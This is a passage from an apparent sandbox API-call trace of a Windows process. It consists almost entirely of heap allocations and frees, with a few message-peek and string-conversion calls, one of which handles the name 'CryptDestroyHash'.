hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0161.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0161.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0161.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.639] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.639] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0161.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.641] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0161.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0161.641] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.642] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.642] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.643] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0161.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0161.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0161.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0161.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0161.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0161.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0161.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0161.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0161.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 